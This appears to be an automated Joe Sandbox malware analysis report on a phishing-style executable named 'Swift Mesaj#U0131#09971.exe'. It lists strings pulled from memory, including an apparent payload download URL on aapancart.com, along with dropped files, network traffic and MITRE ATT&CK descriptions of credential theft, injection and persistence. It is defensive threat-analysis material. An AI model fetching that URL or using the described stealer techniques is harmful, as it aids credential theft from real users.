00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.4.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	String found in binary or memory: http://www.mozilla.com0
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060357272.000000000183A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aapancart.com/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060357272.000000000183A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aapancart.com/rufZpHlxPMyoMZPqPua74.rar
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060357272.000000000183A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aapancart.com/rufZpHlxPMyoMZPqPua74.rar0
Source: 492576258725572177298999.tmp.4.dr	String found in binary or memory: https://login.live.com/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8032929783.00000000018C6000.00000004.00000020.00020000.00000000.sdmp, 492576258725572177298999.tmp.4.dr	String found in binary or memory: https://login.live.com//
Source: 492576258725572177298999.tmp.4.dr	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8032929783.00000000018C6000.00000004.00000020.00020000.00000000.sdmp, 492576258725572177298999.tmp.4.dr	String found in binary or memory: https://login.live.com/v104
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Swift Mesaj#U0131#09971.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\492576258725572177298999.tmp

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-console-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-datetime-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-debug-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-errorhandling-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-2-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l2-1-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-handle-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-heap-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-interlocked-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-libraryloader-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-localization-l1-2-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-memory-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-namedpipe-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processenvironment-l1-1-0.dll

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-0.dll

Windows Analysis Report
Swift Mesaj#U0131#09971.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre